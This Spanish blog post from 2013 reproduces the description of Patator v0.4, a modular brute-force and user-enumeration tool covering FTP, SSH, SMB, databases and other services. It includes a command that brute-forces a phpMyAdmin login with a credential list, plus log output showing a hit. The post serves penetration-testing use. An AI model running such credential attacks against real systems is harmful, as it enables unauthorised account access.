domingo, 23 de junio de 2013

Patator - BruteForcer-ng

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage and is NOT script-kiddie friendly.
Currently(v0.4) it supports the following modules:
 * ftp_login     : Brute-force FTP
 * ssh_login     : Brute-force SSH
 * telnet_login  : Brute-force Telnet
 * smtp_login    : Brute-force SMTP
 * smtp_vrfy     : Enumerate valid users using the SMTP VRFY command
 * smtp_rcpt     : Enumerate valid users using the SMTP RCPT TO command
 * finger_lookup : Enumerate valid users using Finger
 * http_fuzz     : Brute-force HTTP/HTTPS
 * pop_login     : Brute-force POP
 * pop_passd     : Brute-force poppassd (not POP3)
 * imap_login    : Brute-force IMAP
 * ldap_login    : Brute-force LDAP
 * smb_login     : Brute-force SMB
 * smb_lookupsid : Brute-force SMB SID-lookup
 * vmauthd_login : Brute-force VMware Authentication Daemon
 * mssql_login   : Brute-force MSSQL
 * oracle_login  : Brute-force Oracle
 * mysql_login   : Brute-force MySQL
 * mysql_query   : Brute-force MySQL queries
 * pgsql_login   : Brute-force PostgreSQL
 * vnc_login     : Brute-force VNC
 * dns_forward   : Brute-force DNS
 * dns_reverse   : Brute-force DNS (reverse lookup subnets)
 * snmp_login    : Brute-force SNMPv1/2 and SNMPv3
 * unzip_pass    : Brute-force the password of encrypted ZIP files
 * keystore_pass : Brute-force the password of Java keystore files






Usage example: 


    

  • HTTP : Brute-force phpMyAdmin logon
    • 



$ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=COMBO00
&pma_password=COMBO01&server=1&lang=en' 0=combos.txt follow=1 accept_cookie=1
-x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf


 10:55:50 patator    INFO - Starting Patator v0.4 (http://code.google.com/p/patator/) at 2012-06-29 10:55 EST
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - code & size     | candidate           |   num | mesg ..
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - 200 8209:7075   | root:               |    22 | HTTP/1.1 200 OK
 10:55:51 patator    INFO - 200 3838:2566   | root:p@ssw0rd       |    44 | HTTP/1.1 200 OK
 ^C
 10:55:52 patator    INFO - Hits/Done/Size/Fail: 2/125/2342/0, Avg: 47 r/s, Time: 0h 0m 2s
 10:55:52 patator    INFO - To resume execution, pass --resume 12,13,12,13,12,12,13,13,13,12
 

Payload #22 was a false positive:
 $ cat /tmp/qsdf/22_200_8209\:7075.txt
 ...
 <div class="error">Login without a password is forbidden by configuration (see AllowNoPassword)</div>


Download/Source: patator












Publicado por



en






















Etiquetas:
,
,


















No hay comentarios:















Publicar un comentario


















        

      









Suscribirse a:
Enviar comentarios (Atom)